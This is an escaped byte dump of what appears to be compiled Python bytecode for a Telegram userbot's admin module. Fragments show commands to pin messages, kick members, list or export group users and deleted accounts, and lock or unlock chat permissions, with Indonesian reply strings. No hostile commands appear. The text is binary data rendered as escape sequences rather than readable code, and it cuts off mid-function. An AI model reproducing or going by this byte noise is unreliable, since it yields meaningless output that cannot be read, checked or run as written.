N\xfa\tthis chatz\r<b>Admins in z\x07:</b> \n)\x01\xda\x06filterz\x16<a href="tg://user?id=z\x02">z\x04</a>z\x06<code>z\x07</code>\xda\x01\n\xfa\x01 z\x17\nDeleted Account <code>\xda\x04html\xa9\x01Z\nparse_mode)\x0cr6\x00\x00\x00\xda\nget_entityr:\x00\x00\x00rP\x00\x00\x00rt\x00\x00\x00r\x13\x00\x00\x00ru\x00\x00\x00rL\x00\x00\x00rO\x00\x00\x00r\x08\x00\x00\x00rX\x00\x00\x00r.\x00\x00\x00)\x08rv\x00\x00\x00\xda\x04inforP\x00\x00\x00\xda\x08mentionsrQ\x00\x00\x00Z\x04linkZ\x06userid\xda\x03errr@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\tget_admin]\x02\x00\x00s \x00\x00\x00\x00\x03\x14\x01\x10\x01\x0c\x01\x02\x01\x06\x01\x04\x00\x02\xff\x12\x02\x06\x01\x16\x01\x0e\x01\x16\x02\x1a\x01\x10\x01&\x01r\x82\x00\x00\x00z\x10^.pin(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\r\x00\x00\x00\xc3\x00\x00\x00s$\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00|\x00j\x05}\x04|\x04sT|\x00\xa0\x03d\x02\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00|\x00j\x06\xa0\x07d\x03\xa1\x01}\x05d\x04}\x06|\x05\xa0\x08\xa1\x00d\x05k\x02rtd\x06}\x06z\x1e|\x00\xa0\tt\n|\x00j\x0b|\x04|\x06\x83\x03\xa1\x01I\x00d\x01H\x00\x01\x00W\x00n&\x04\x00t\x0ck\nr\xb8\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\r\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00|\x00\xa0\x03d\x07\xa1\x01I\x00d\x01H\x00\x01\x00t\x0e|\x00j\x0f|\x00\x83\x02I\x00d\x01H\x00}\x07t\x10\x90\x01r |\x00j\t\xa0\x11t\x12d\x08|\x07j\x13\x9b\x00d\t|\x07j\x14\x9b\x00d\n|\x00j\x15j\x16\x9b\x00d\x0b|\x00j\x17\x9b\x00d\x0c|\x06\x0c\x00\x9b\x00\x9d\n\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\rzH For .pin command, pins the replied/tagged message on the top the chat. 
Nz\x1f`Reply to a message to pin it.`ro\x00\x00\x00TZ\x04loudFz\x10`Pesan di Pin!!`z\r#PIN\nADMIN: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00z\t`)\nLOUD: )\x18r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00\xda\x0freply_to_msg_idrq\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00r6\x00\x00\x00r\x11\x00\x00\x00Z\x05to_idr\x07\x00\x00\x00rM\x00\x00\x00\xda\x10get_user_from_id\xda\x07from_idr\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00rL\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00r:\x00\x00\x00)\x08\xda\x03msgr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00Z\x06to_pinZ\x07optionsZ\tis_silentrQ\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x03pinq\x02\x00\x00s8\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x02\x06\x02\x04\x01\x10\x01\x04\x02\x0c\x02\x04\x02\x0c\x01\x04\x02\x02\x01\x04\x01\x0c\xff\x0e\x02\x0e\x01\x10\x01\x08\x02\x10\x02\x12\x02\x06\x01\x06\x01\x02\x00,\xffr\x87\x00\x00\x00z\x11^.kick(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00st\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00t\x05|\x00\x83\x01I\x00d\x01H\x00\\\x02}\x04}\x05|\x04s`|\x00\xa0\x03d\x02\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00|\x00\xa0\x03d\x03\xa1\x01I\x00d\x01H\x00\x01\x00z*|\x00j\x06\xa0\x07|\x00j\x08|\x04j\t\xa1\x02I\x00d\x01H\x00\x01\x00t\nd\x04\x83\x01I\x00d\x01H\x00\x01\x00W\x00nF\x04\x00t\x0bk\nr\xe0\x01\x00}\x06\x01\x00z(|\x00\xa0\x03t\x0cd\x05t\r|\x06\x83\x01\x9b\x00\x9d\x02\x17\x00\xa1\x01I\x00d\x01H\x00\x01\x00W\x00Y\x00\xa2\x04d\x01S\x00d\x01}\x06~\x06X\x00Y\x00n\x02X\x00|\x05\x90\x01r\x10|\x00\xa0\x03d\x06|\x04j\x0e\x9b\x00d\x07|\x04j\t\x9b\x00d\x08|\x05\x9b\x00\x9d\x06\xa1\x01I\x00d\x01H\x00\x01\x00n"|\x00\xa0\x03d\x06|\x04j\x0e\x9b\x00d\x07|\x04j\t\x9b\x00d\t\x9d\x05\xa1\x01I\x00d\x01H\x00\x01\x00t\x0f\x90\x01rp|\x00j\x06\xa0\x10t\x11d\n|\x04j\x0e\x9b\x00d\
x07|\x04j\t\x9b\x00d\x0b|\x00j\x12j\x13\x9b\x00d\x0c|\x00j\x08\x9b\x00d\r\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x0ezD For .kick command, kicks the replied/tagged person from the group. Nz\x16`Couldn\'t fetch user.`z\x0c`Kicking...`g\x00\x00\x00\x00\x00\x00\xe0?rz\x00\x00\x00z\x10`di Tendang!!` [rG\x00\x00\x00z\r)`!`\nReason: z\x04)`!`z\r#KICK\nUSER: [rH\x00\x00\x00rI\x00\x00\x00z\x03`)\n)\x14r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00rK\x00\x00\x00r6\x00\x00\x00\xda\x10kick_participantr:\x00\x00\x00rL\x00\x00\x00r\x02\x00\x00\x00\xda\tExceptionrM\x00\x00\x00rX\x00\x00\x00rO\x00\x00\x00r\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00)\x07Z\x03usrr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rQ\x00\x00\x00rY\x00\x00\x00\xda\x01er@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x04kick\x9e\x02\x00\x00s:\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x02\x12\x01\x04\x01\x10\x01\x04\x02\x10\x02\x02\x01\x18\x01\x12\x01\x10\x01\x1e\x01\x18\x02\x06\x01\x04\x01\x18\xff\x0c\x04\x04\x01\x14\xff\n\x03\x06\x01\x06\x01\x02\x00&\xffr\x8b\x00\x00\x00z\r^.users ?(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00s\xc8\x01\x00\x00|\x00j\x00\xa0\x01|\x00j\x02\xa1\x01I\x00d\x01H\x00}\x01|\x01j\x03r 
|\x01j\x03n\x02d\x02}\x02d\x03\xa0\x04|\x02\xa1\x01}\x03z\xd8|\x00j\x05\xa0\x06d\x04\xa1\x01s\x98|\x00j\x00\xa0\x07|\x00j\x02\xa1\x012\x00zH3\x00d\x01H\x00W\x00}\x04|\x04j\x08s\x80|\x03d\x05|\x04j\t\x9b\x00d\x06|\x04j\n\x9b\x00d\x07|\x04j\n\x9b\x00d\x08\x9d\x077\x00}\x03qJ|\x03d\t|\x04j\n\x9b\x00d\x08\x9d\x037\x00}\x03qJ6\x00nl|\x00j\x05\xa0\x06d\x04\xa1\x01}\x05|\x00j\x00j\x07|\x00j\x02|\x05\x9b\x00d\n\x8d\x022\x00zH3\x00d\x01H\x00W\x00}\x04|\x04j\x08s\xee|\x03d\x05|\x04j\t\x9b\x00d\x06|\x04j\n\x9b\x00d\x07|\x04j\n\x9b\x00d\x08\x9d\x077\x00}\x03q\xb8|\x03d\t|\x04j\n\x9b\x00d\x08\x9d\x037\x00}\x03q\xb86\x00W\x00n8\x04\x00t\x0bk\n\x90\x01r>\x01\x00}\x06\x01\x00z\x18|\x03d\x0bt\x0c|\x06\x83\x01\x17\x00d\x0c\x17\x007\x00}\x03W\x005\x00d\x01}\x06~\x06X\x00Y\x00n\x02X\x00z\x14|\x00\xa0\r|\x03\xa1\x01I\x00d\x01H\x00\x01\x00W\x00nn\x04\x00t\x0ek\n\x90\x01r\xc2\x01\x00\x01\x00\x01\x00|\x00\xa0\rd\r\xa1\x01I\x00d\x01H\x00\x01\x00t\x0fd\x0ed\x0f\x83\x02}\x07|\x07\xa0\x10|\x03\xa1\x01\x01\x00|\x07\xa0\x11\xa1\x00\x01\x00|\x00j\x00j\x12|\x00j\x02d\x0ed\x10\xa0\x04|\x02\xa1\x01|\x00j\nd\x11\x8d\x04I\x00d\x01H\x00\x01\x00t\x13d\x0e\x83\x01\x01\x00Y\x00n\x02X\x00d\x01S\x00)\x12z6 For .users command, list all of the users in a chat. Nrx\x00\x00\x00z\x15List Anggota di {}: \nro\x00\x00\x00\xfa\x02\n[rG\x00\x00\x00\xfa\x03) `rU\x00\x00\x00z\x12\nDeleted Account `\xa9\x01\xda\x06searchr{\x00\x00\x00rz\x00\x00\x00z:Damn, this is a huge group. 
Uploading users lists as file.\xfa\ruserslist.txt\xfa\x02w+\xfa\x0bUsers in {}\xa9\x02Z\x07captionZ\x08reply_to\xa9\x14r6\x00\x00\x00r~\x00\x00\x00r:\x00\x00\x00rP\x00\x00\x00\xda\x06formatrq\x00\x00\x00rr\x00\x00\x00rt\x00\x00\x00ru\x00\x00\x00rO\x00\x00\x00rL\x00\x00\x00r\x08\x00\x00\x00rX\x00\x00\x00r.\x00\x00\x00r\r\x00\x00\x00\xda\x04open\xda\x05write\xda\x05closeZ\tsend_filer\x03\x00\x00\x00\xa9\x08rv\x00\x00\x00r\x7f\x00\x00\x00rP\x00\x00\x00r\x80\x00\x00\x00rQ\x00\x00\x00Z\x07searchqr\x81\x00\x00\x00\xda\x04filer@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\tget_users\xc8\x02\x00\x00sF\x00\x00\x00\x00\x03\x14\x01\x10\x01\n\x01\x02\x01\x0c\x01\x1a\x01\x06\x01$\x02\x18\x02\x0c\x01\x06\x01\x04\x00\x04\xff\x12\x02\x06\x01$\x02\x1a\x01\x12\x01&\x01\x02\x01\x14\x01\x10\x01\x04\x01\x02\xff\n\x02\n\x01\n\x01\x08\x01\x06\x01\x04\x01\x02\x01\x08\x01\x04\xfc\x0c\x06r\x9b\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00sD\x01\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02d\x02d\x01\xa1\x02}\x01d\x03}\x02|\x00j\x03rZt\x04|\x01\x83\x01d\x04k\x02sZ|\x00\xa0\x05\xa1\x00I\x00d\x03H\x00}\x03|\x00j\x06\xa0\x07|\x03j\x08\xa1\x01I\x00d\x03H\x00}\x04|\x00j\x00\xa0\x01d\x01\xa1\x01}\x02n\xe2|\x01\x90\x01r<|\x01d\x05\x19\x00}\x05t\x04|\x01\x83\x01d\x04k\x02r||\x01d\x01\x19\x00}\x02|\x05\xa0\t\xa1\x00r\x8ct\n|\x05\x83\x01}\x05|\x05s\xa4|\x00\xa0\x0bd\x06\xa1\x01I\x00d\x03H\x00\x01\x00d\x03S\x00|\x00j\x0cj\rd\x03k\tr\xe2|\x00j\x0cj\rd\x05\x19\x00}\x06t\x0e|\x06t\x0f\x83\x02r\xe2|\x06j\x10}\x07|\x00j\x06\xa0\x07|\x07\xa1\x01I\x00d\x03H\x00}\x04|\x04S\x00z\x16|\x00j\x06\xa0\x07|\x05\xa1\x01I\x00d\x03H\x00}\x04W\x00nB\x04\x00t\x11t\x12f\x02k\n\x90\x01r:\x01\x00}\x08\x01\x00z\x1e|\x00\xa0\x0bt\x13|\x08\x83\x01\xa1\x01I\x00d\x03H\x00\x01\x00W\x00Y\x00\xa2\x04d\x03S\x00d\x03}\x08~\x08X\x00Y\x00n\x02X\x00|\x04|\x02f\x02S\x00)\x07z0 Get the user from argument or replied message. 
ro\x00\x00\x00r{\x00\x00\x00Nrp\x00\x00\x00r\x01\x00\x00\x00z(`Pass the user\'s username, id or reply!`\xa9\x14rq\x00\x00\x00rr\x00\x00\x00r8\x00\x00\x00r\x83\x00\x00\x00\xda\x03lenr/\x00\x00\x00r6\x00\x00\x00r~\x00\x00\x00r\x85\x00\x00\x00\xda\tisnumeric\xda\x03intr.\x00\x00\x00r,\x00\x00\x00Z\x08entitiesr5\x00\x00\x00r\x16\x00\x00\x00\xda\x07user_id\xda\tTypeError\xda\nValueErrorrX\x00\x00\x00\xa9\t\xda\x05event\xda\x04argsZ\x05extraZ\x10previous_message\xda\x08user_objrQ\x00\x00\x00Z\x1cprobable_user_mention_entityr\xa0\x00\x00\x00r\x81\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00rK\x00\x00\x00\xf0\x02\x00\x00s:\x00\x00\x00\x00\x02\x14\x01\x04\x01\x12\x01\x0e\x01\x14\x01\x0e\x01\x06\x01\x08\x01\x0c\x01\x08\x02\x08\x01\x08\x02\x04\x01\x10\x01\x04\x02\x0c\x01\x0c\x02\x04\x01\x02\xff\x04\x02\x06\x01\x12\x01\x04\x01\x02\x01\x16\x01\x16\x01\x14\x01\x18\x02rK\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00sn\x00\x00\x00t\x00|\x00t\x01\x83\x02r\x12t\x02|\x00\x83\x01}\x00z\x16|\x01j\x03\xa0\x04|\x00\xa1\x01I\x00d\x00H\x00}\x02W\x00n@\x04\x00t\x05t\x06f\x02k\nrh\x01\x00}\x03\x01\x00z\x1e|\x01\xa0\x07t\x01|\x03\x83\x01\xa1\x01I\x00d\x00H\x00\x01\x00W\x00Y\x00\xa2\x04d\x00S\x00d\x00}\x03~\x03X\x00Y\x00n\x02X\x00|\x02S\x00\xa9\x01N\xa9\x08r5\x00\x00\x00rX\x00\x00\x00r\x9f\x00\x00\x00r6\x00\x00\x00r~\x00\x00\x00r\xa1\x00\x00\x00r\xa2\x00\x00\x00r.\x00\x00\x00\xa9\x04rQ\x00\x00\x00r\xa4\x00\x00\x00r\xa6\x00\x00\x00r\x81\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00r\x84\x00\x00\x00\x15\x03\x00\x00s\x10\x00\x00\x00\x00\x01\n\x01\x08\x02\x02\x01\x16\x01\x14\x01\x14\x01\x18\x02r\x84\x00\x00\x00z\x10^.usersdel ?(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00s\xa0\x01\x00\x00|\x00j\x00\xa0\x01|\x00j\x02\xa1\x01I\x00d\x01H\x00}\x01|\x01j\x03r 
|\x01j\x03n\x02d\x02}\x02d\x03\xa0\x04|\x02\xa1\x01}\x03z\xb0|\x00j\x05\xa0\x06d\x04\xa1\x01s\x84|\x00j\x00\xa0\x07|\x00j\x02\xa1\x012\x00z43\x00d\x01H\x00W\x00}\x04|\x04j\x08sJ|\x03d\x05|\x04j\t\x9b\x00d\x06|\x04j\n\x9b\x00d\x07|\x04j\n\x9b\x00d\x08\x9d\x077\x00}\x03qJ6\x00nX|\x00j\x05\xa0\x06d\x04\xa1\x01}\x05|\x00j\x00j\x07|\x00j\x02|\x05\x9b\x00d\t\x8d\x022\x00z43\x00d\x01H\x00W\x00}\x04|\x04j\x08s\xa4|\x03d\x05|\x04j\t\x9b\x00d\x06|\x04j\n\x9b\x00d\x07|\x04j\n\x9b\x00d\x08\x9d\x077\x00}\x03q\xa46\x00W\x00n8\x04\x00t\x0bk\n\x90\x01r\x16\x01\x00}\x06\x01\x00z\x18|\x03d\nt\x0c|\x06\x83\x01\x17\x00d\x0b\x17\x007\x00}\x03W\x005\x00d\x01}\x06~\x06X\x00Y\x00n\x02X\x00z\x14|\x00\xa0\r|\x03\xa1\x01I\x00d\x01H\x00\x01\x00W\x00nn\x04\x00t\x0ek\n\x90\x01r\x9a\x01\x00\x01\x00\x01\x00|\x00\xa0\rd\x0c\xa1\x01I\x00d\x01H\x00\x01\x00t\x0fd\rd\x0e\x83\x02}\x07|\x07\xa0\x10|\x03\xa1\x01\x01\x00|\x07\xa0\x11\xa1\x00\x01\x00|\x00j\x00j\x12|\x00j\x02d\x0fd\x10\xa0\x04|\x02\xa1\x01|\x00j\nd\x11\x8d\x04I\x00d\x01H\x00\x01\x00t\x13d\x0f\x83\x01\x01\x00Y\x00n\x02X\x00d\x01S\x00)\x12zA For .usersdel command, list all of the deleted users in a chat. Nrx\x00\x00\x00z\x15deletedUsers in {}: \nro\x00\x00\x00r\x8c\x00\x00\x00rG\x00\x00\x00r\x8d\x00\x00\x00rU\x00\x00\x00r\x8e\x00\x00\x00r{\x00\x00\x00rz\x00\x00\x00zADamn, this is a huge group. 
Uploading deletedusers lists as file.r\x90\x00\x00\x00r\x91\x00\x00\x00z\x14deleteduserslist.txtr\x92\x00\x00\x00r\x93\x00\x00\x00r\x94\x00\x00\x00r\x99\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x0cget_usersdel"\x03\x00\x00sB\x00\x00\x00\x00\x03\x14\x01\x10\x01\n\x01\x02\x01\x0c\x01\x1a\x01\x06\x01(\x04\x0c\x01\x06\x01\x04\x00\x04\xff\x12\x02\x06\x01*\x03\x12\x01&\x01\x02\x01\x14\x01\x10\x01\x04\x01\x02\xff\n\x02\n\x01\n\x01\x08\x01\x06\x01\x04\x01\x02\x01\x08\x01\x04\xfc\x0c\x06r\xaa\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00sD\x01\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02d\x02d\x01\xa1\x02}\x01d\x03}\x02|\x00j\x03rZt\x04|\x01\x83\x01d\x04k\x02sZ|\x00\xa0\x05\xa1\x00I\x00d\x03H\x00}\x03|\x00j\x06\xa0\x07|\x03j\x08\xa1\x01I\x00d\x03H\x00}\x04|\x00j\x00\xa0\x01d\x01\xa1\x01}\x02n\xe2|\x01\x90\x01r<|\x01d\x05\x19\x00}\x05t\x04|\x01\x83\x01d\x04k\x02r||\x01d\x01\x19\x00}\x02|\x05\xa0\t\xa1\x00r\x8ct\n|\x05\x83\x01}\x05|\x05s\xa4|\x00\xa0\x0bd\x06\xa1\x01I\x00d\x03H\x00\x01\x00d\x03S\x00|\x00j\x0cj\rd\x03k\tr\xe2|\x00j\x0cj\rd\x05\x19\x00}\x06t\x0e|\x06t\x0f\x83\x02r\xe2|\x06j\x10}\x07|\x00j\x06\xa0\x07|\x07\xa1\x01I\x00d\x03H\x00}\x04|\x04S\x00z\x16|\x00j\x06\xa0\x07|\x05\xa1\x01I\x00d\x03H\x00}\x04W\x00nB\x04\x00t\x11t\x12f\x02k\n\x90\x01r:\x01\x00}\x08\x01\x00z\x1e|\x00\xa0\x0bt\x13|\x08\x83\x01\xa1\x01I\x00d\x03H\x00\x01\x00W\x00Y\x00\xa2\x04d\x03S\x00d\x03}\x08~\x08X\x00Y\x00n\x02X\x00|\x04|\x02f\x02S\x00)\x07z8 Get the deleted user from argument or replied message. 
ro\x00\x00\x00r{\x00\x00\x00Nrp\x00\x00\x00r\x01\x00\x00\x00z0`Pass the deleted user\'s username, id or reply!`r\x9c\x00\x00\x00r\xa3\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x16get_userdel_from_eventJ\x03\x00\x00s:\x00\x00\x00\x00\x02\x14\x01\x04\x01\x12\x01\x0e\x01\x14\x01\x0e\x01\x06\x01\x08\x01\x0c\x01\x08\x02\x08\x01\x08\x02\x04\x01\x10\x01\x04\x02\x0c\x01\x0c\x02\x04\x01\x02\xff\x04\x02\x06\x01\x12\x01\x04\x01\x02\x01\x16\x01\x16\x01\x14\x01\x18\x02r\xab\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00sn\x00\x00\x00t\x00|\x00t\x01\x83\x02r\x12t\x02|\x00\x83\x01}\x00z\x16|\x01j\x03\xa0\x04|\x00\xa1\x01I\x00d\x00H\x00}\x02W\x00n@\x04\x00t\x05t\x06f\x02k\nrh\x01\x00}\x03\x01\x00z\x1e|\x01\xa0\x07t\x01|\x03\x83\x01\xa1\x01I\x00d\x00H\x00\x01\x00W\x00Y\x00\xa2\x04d\x00S\x00d\x00}\x03~\x03X\x00Y\x00n\x02X\x00|\x02S\x00r\xa7\x00\x00\x00r\xa8\x00\x00\x00r\xa9\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x13get_userdel_from_ido\x03\x00\x00s\x10\x00\x00\x00\x00\x01\n\x01\x08\x02\x02\x01\x16\x01\x14\x01\x14\x01\x18\x02r\xac\x00\x00\x00z\r^\\.lock 
?(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\r\x00\x00\x00\xc3\x00\x00\x00s\xfc\x01\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02\xa1\x00}\x01|\x00j\x03}\x02d\x00}\x03d\x00}\x04d\x00}\x05d\x00}\x06d\x00}\x07d\x00}\x08d\x00}\td\x00}\nd\x00}\x0bd\x00}\x0c|\x01d\x02k\x02rRd\x03}\x03d\x04}\r\x90\x01n\x0e|\x01d\x05k\x02rdd\x03}\x04d\x05}\rn\xfc|\x01d\x06k\x02rvd\x03}\x05d\x07}\rn\xea|\x01d\x08k\x02r\x88d\x03}\x06d\t}\rn\xd8|\x01d\nk\x02r\x9ad\x03}\x07d\x0b}\rn\xc6|\x01d\x0ck\x02r\xacd\x03}\x08d\r}\rn\xb4|\x01d\x0ek\x02r\xbed\x03}\td\x0f}\rn\xa2|\x01d\x10k\x02r\xd0d\x03}\nd\x11}\rn\x90|\x01d\x12k\x02r\xe2d\x03}\x0bd\x13}\rn~|\x01d\x14k\x02r\xf4d\x03}\x0cd\x15}\rnl|\x01d\x16k\x02\x90\x01r,d\x03}\x03d\x03}\x04d\x03}\x05d\x03}\x06d\x03}\x07d\x03}\x08d\x03}\td\x03}\nd\x03}\x0bd\x03}\x0cd\x17}\rn4|\x01\x90\x01sF|\x00\xa0\x04d\x18\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x04d\x19|\x01\x9b\x00\x9d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00t\x05d\x00|\x03|\x04|\x05|\x06|\x07|\x08|\t|\n|\x0b|\x0cd\x1a\x8d\x0b}\x0ez4|\x00\xa0\x06t\x07|\x02|\x0ed\x1b\x8d\x02\xa1\x01I\x00d\x00H\x00\x01\x00|\x00\xa0\x04d\x1c|\r\x9b\x00d\x1d\x9d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00nD\x04\x00t\x08k\n\x90\x01r\xf6\x01\x00}\x0f\x01\x00z$|\x00\xa0\x04d\x1et\t|\x0f\x83\x01\x9b\x00\x9d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00Y\x00\xa2\x04d\x00S\x00d\x00}\x0f~\x0fX\x00Y\x00n\x02X\x00d\x00S\x00)\x1fNro\x00\x00\x00r\x86\x00\x00\x00T\xda\x08messagesr4\x00\x00\x00\xda\x07sticker\xda\x08stickers\xda\x03gif\xda\x04GIFs\xda\x04game\xda\x05games\xda\x06inline\xfa\x0binline bots\xda\x04poll\xda\x05polls\xda\x06invite\xda\x07invitesr\x87\x00\x00\x00\xda\x04pinsr\x7f\x00\x00\x00\xfa\tchat info\xda\x03all\xda\neverythingz\x19`I can\'t lock nothing !!`z\x15`Invalid lock type:` \xa9\x0br \x00\x00\x00r"\x00\x00\x00r#\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00r&\x00\x00\x00r\'\x00\x00\x00Z\nsend_pollsrD\x00\x00\x00rF\x00\x00\x00rE\x00\x00\x00\xa9\x02Z\x04peerZ\rbanned_rightsz\x08`Locked 
\xfa\x12 for this chat !!`\xfa1`Do I have proper rights for that ??`\n**Error:** \xa9\nrq\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00r:\x00\x00\x00r.\x00\x00\x00r\x15\x00\x00\x00r6\x00\x00\x00Z"EditChatDefaultBannedRightsRequest\xda\rBaseExceptionrX\x00\x00\x00)\x10r\xa4\x00\x00\x00\xda\tinput_str\xda\x07peer_idr\x86\x00\x00\x00r4\x00\x00\x00r\xae\x00\x00\x00r\xb0\x00\x00\x00\xda\x05gamee\xda\x07ainline\xda\x05gpoll\xda\x07adduser\xda\x04cpin\xda\nchangeinfo\xda\x04whatZ\x0block_rightsr\x8a\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x05locks{\x03\x00\x00s\xa8\x00\x00\x00\x00\x02\x10\x01\x06\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x08\x01\x04\x01\x08\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\x08\x01\x04\x01\x06\x01\n\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x06\x02\x06\x01\x10\x01\x04\x02\x16\x01\x04\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf5\x06\r\x02\x01\x04\x01\x04\x01\x02\xff\x04\xff\n\x03\x1c\x01\x12\x01\x04\x01\x0c\xff\n\x02r\xcd\x00\x00\x00z\x0e^.unlock 
?(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\r\x00\x00\x00\xc3\x00\x00\x00s\xfc\x01\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02\xa1\x00}\x01|\x00j\x03}\x02d\x00}\x03d\x00}\x04d\x00}\x05d\x00}\x06d\x00}\x07d\x00}\x08d\x00}\td\x00}\nd\x00}\x0bd\x00}\x0c|\x01d\x02k\x02rRd\x03}\x03d\x04}\r\x90\x01n\x0e|\x01d\x05k\x02rdd\x03}\x04d\x05}\rn\xfc|\x01d\x06k\x02rvd\x03}\x05d\x07}\rn\xea|\x01d\x08k\x02r\x88d\x03}\x06d\t}\rn\xd8|\x01d\nk\x02r\x9ad\x03}\x07d\x0b}\rn\xc6|\x01d\x0ck\x02r\xacd\x03}\x08d\r}\rn\xb4|\x01d\x0ek\x02r\xbed\x03}\td\x0f}\rn\xa2|\x01d\x10k\x02r\xd0d\x03}\nd\x11}\rn\x90|\x01d\x12k\x02r\xe2d\x03}\x0bd\x13}\rn~|\x01d\x14k\x02r\xf4d\x03}\x0cd\x15}\rnl|\x01d\x16k\x02\x90\x01r,d\x03}\x03d\x03}\x04d\x03}\x05d\x03}\x06d\x03}\x07d\x03}\x08d\x03}\td\x03}\nd\x03}\x0bd\x03}\x0cd\x17}\rn4|\x01\x90\x01sF|\x00\xa0\x04d\x18\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x04d\x19|\x01\x9b\x00\x9d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00t\x05d\x00|\x03|\x04|\x05|\x06|\x07|\x08|\t|\n|\x0b|\x0cd\x1a\x8d\x0b}\x0ez4|\x00\xa0\x06t\x07|\x02|\x0ed\x1b\x8d\x02\xa1\x01I\x00d\x00H\x00\x01\x00|\x00\xa0\x04d\x1c|\r\x9b\x00d\x1d\x9d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00nD\x04\x00t\x08k\n\x90\x01r\xf6\x01\x00}\x0f\x01\x00z$|\x00\xa0\x04d\x1et\t|\x0f\x83\x01\x9b\x00\x9d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00Y\x00\xa2\x04d\x00S\x00d\x00}\x0f~\x0fX\x00Y\x00n\x02X\x00d\x00S\x00)\x1fNro\x00\x00\x00r\x86\x00\x00\x00Fr\xad\x00\x00\x00r4\x00\x00\x00r\xae\x00\x00\x00r\xaf\x00\x00\x00r\xb0\x00\x00\x00r\xb1\x00\x00\x00r\xb2\x00\x00